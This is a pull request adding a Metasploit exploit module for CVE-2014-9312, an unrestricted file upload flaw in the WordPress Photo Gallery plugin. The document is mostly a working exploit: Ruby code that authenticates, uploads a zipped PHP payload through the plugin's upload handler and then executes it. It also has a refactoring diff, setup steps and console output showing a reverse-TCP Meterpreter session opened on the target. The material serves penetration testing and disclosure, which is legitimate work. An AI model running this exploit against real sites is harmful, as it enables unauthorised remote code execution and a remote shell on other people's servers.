### PR TITLE
Add WordPress Photo Gallery upload module

### DIFF
--- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb
@@ -76,41 +76,45 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Preparing payload...")
     payload_name = Rex::Text.rand_text_alpha(10)
-    uploader_url = normalize_uri(wordpress_url_admin_ajax, '?action=bwg_UploadHandler&dir=rce/')
     data = generate_mime_message(payload, payload_name)
 
     print_status("#{peer} - Uploading payload...")
     res = send_request_cgi(
-      'method'  => 'POST',
-      'uri'     => uploader_url,
-      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
-      'data'    => data.to_s,
-      'cookie'  => cookie
+      'method'    => 'POST',
+      'uri'       => wordpress_url_admin_ajax,
+      'vars_get'  => { 'action' => 'bwg_UploadHandler', 'dir' => 'rce/' },
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => data.to_s,
+      'cookie'    => cookie
     )
 
     fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
-    vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
+    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
     print_good("#{peer} - Uploaded the payload")
 
     print_status("#{peer} - Parsing server response...")
-    json = JSON.parse(res.body)
-    if json.nil? || !json['files']
-      fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
-    else
-      uploaded_name = json['files'][0]['name'][0..-5]
-      php_file_name = "#{uploaded_name}.php"
-      payload_url = normalize_uri(wordpress_url_backend, 'rce', uploaded_name, php_file_name)
-      print_good("#{peer} - Parsed response")
+    begin
+      json = JSON.parse(res.body)
+      if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil?
+        fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
+      else
+        uploaded_name = json['files'][0]['name'][0..-5]
+        php_file_name = "#{uploaded_name}.php"
+        payload_url = normalize_uri(wordpress_url_backend, 'rce', uploaded_name, php_file_name)
+        print_good("#{peer} - Parsed response")
 
-      register_files_for_cleanup(php_file_name)
-      register_files_for_cleanup("../#{uploaded_name}.zip")
-      print_status("#{peer} - Executing the payload at #{payload_url}")
-      send_request_cgi(
-      {
-        'uri'     => payload_url,
-        'method'  => 'GET'
-      }, 5)
-      print_good("#{peer} - Executed payload")
+        register_files_for_cleanup(php_file_name)
+        register_files_for_cleanup("../#{uploaded_name}.zip")
+        print_status("#{peer} - Executing the payload at #{payload_url}")
+        send_request_cgi(
+        {
+          'uri'     => payload_url,
+          'method'  => 'GET'
+        }, 5)
+        print_good("#{peer} - Executed payload")
+      end
+    rescue
+      fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
     end
   end
 end

--- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+require 'json'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Photo Gallery 1.2.5 Unrestricted File Upload',
+      'Description'     => %q{Photo Gallery Plugin for WordPress contains a flaw that allows a
+                              remote attacker to execute arbitrary PHP code. This flaw exists
+                              because the photo-gallery\photo-gallery.php script allows access
+                              to filemanager\UploadHandler.php. The post() method in UploadHandler.php
+                              does not properly verify or sanitize user-uploaded files.},
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Kacper Szurek',                  # Vulnerability disclosure
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['OSVDB', '117676'],
+          ['WPVDB', '7769'],
+          ['CVE', '2014-9312']
+        ],
+      'DisclosureDate'  => 'Nov 11 2014',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['photo-gallery < 1.2.6', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+      ], self.class)
+  end
+
+  def check
+    check_plugin_version_from_readme('photo-gallery', '1.2.6')
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def generate_mime_message(payload, name)
+    data = Rex::MIME::Message.new
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file("#{name}.php", payload.encoded)
+    data.add_part(zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"files\"; filename=\"#{name}.zip\"")
+    data
+  end
+
+  def exploit
+    print_status("#{peer} - Authenticating using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("#{peer} - Authenticated with WordPress")
+
+    print_status("#{peer} - Preparing payload...")
+    payload_name = Rex::Text.rand_text_alpha(10)
+    uploader_url = normalize_uri(wordpress_url_admin_ajax, '?action=bwg_UploadHandler&dir=rce/')
+    data = generate_mime_message(payload, payload_name)
+
+    print_status("#{peer} - Uploading payload...")
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => uploader_url,
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => data.to_s,
+      'cookie'  => cookie
+    )
+
+    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
+    vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
+    print_good("#{peer} - Uploaded the payload")
+
+    print_status("#{peer} - Parsing server response...")
+    json = JSON.parse(res.body)
+    if json.nil? || !json['files']
+      fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
+    else
+      uploaded_name = json['files'][0]['name'][0..-5]
+      php_file_name = "#{uploaded_name}.php"
+      payload_url = normalize_uri(wordpress_url_backend, 'rce', uploaded_name, php_file_name)
+      print_good("#{peer} - Parsed response")
+
+      register_files_for_cleanup(php_file_name)
+      register_files_for_cleanup("../#{uploaded_name}.zip")
+      print_status("#{peer} - Executing the payload at #{payload_url}")
+      send_request_cgi(
+      {
+        'uri'     => payload_url,
+        'method'  => 'GET'
+      }, 5)
+      print_good("#{peer} - Executed payload")
+    end
+  end
+end


### PR DESCRIPTION
This module provides the ability for a registered user of any level to upload and execute an arbitrary PHP file by utilising a lack of validation in WordPress websites using versions <= 1.2.5 of the Photo Gallery plugin.
## References
- http://www.osvdb.org/117676
- https://wpvulndb.com/vulnerabilities/7769
## Verification
- [ ] Download and install [WordPress](https://wordpress.org/download/)
- [ ] Download v1.2.5 of the Photo Gallery plugin from the plugin archive at https://downloads.wordpress.org/plugin/photo-gallery.1.2.5.zip
- [ ] Extract the `photo-gallery` folder into the `/wp-content/plugins/` directory inside your WordPress installation folder
- [ ] Login to your WordPress website and navigate to the plugins section (`/wp-admin/plugins.php`) and click the "Activate" link for the Photo Gallery plugin to activate it 
- [ ] Load msfconsole and `use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload`
- [ ] Set RHOST to the target's address
- [ ] If running WordPress in a subdirectory, ensure to set TARGETURI appropriately (e.g. if running in a folder called wordpress, set TARGETURI to /wordpress/)
- [ ] Set USERNAME to a valid registered username
- [ ] Set PASSWORD to the matching password for USERNAME
- [ ] Set the payload
- [ ] Run `check` to check if the version seems vulnerable
- [ ] Run `exploit` to upload and execute the payload
## Example Output

```
msf > use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload
msf exploit(wp_photo_gallery_unrestricted_file_upload) > set USERNAME root
USERNAME => root
msf exploit(wp_photo_gallery_unrestricted_file_upload) > set PASSWORD toor
PASSWORD => toor
msf exploit(wp_photo_gallery_unrestricted_file_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_photo_gallery_unrestricted_file_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_photo_gallery_unrestricted_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(wp_photo_gallery_unrestricted_file_upload) > set LHOST 192.168.1.189
LHOST => 192.168.1.189
msf exploit(wp_photo_gallery_unrestricted_file_upload) > run

[*] Started reverse handler on 192.168.1.189:4444 
[*] 192.168.1.15:80 - Authenticating using root:toor...
[+] 192.168.1.15:80 - Authenticated with WordPress
[*] 192.168.1.15:80 - Preparing payload...
[*] 192.168.1.15:80 - Uploading payload...
[+] 192.168.1.15:80 - Uploaded the payload
[*] 192.168.1.15:80 - Parsing server response...
[+] 192.168.1.15:80 - Parsed response
[*] 192.168.1.15:80 - Executing the payload at /wordpress/wp-admin/rce/IHvuUVfUGS/IHvuUVfUGS.php
[*] Sending stage (40499 bytes) to 192.168.1.15
[*] Meterpreter session 6 opened (192.168.1.189:4444 -> 192.168.1.15:49442) at 2015-02-11 01:12:08 +0000
[+] Deleted IHvuUVfUGS.php
[+] Deleted ../IHvuUVfUGS.zip
[+] 192.168.1.15:80 - Executed payload

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64
Meterpreter : php/php
meterpreter > 
```
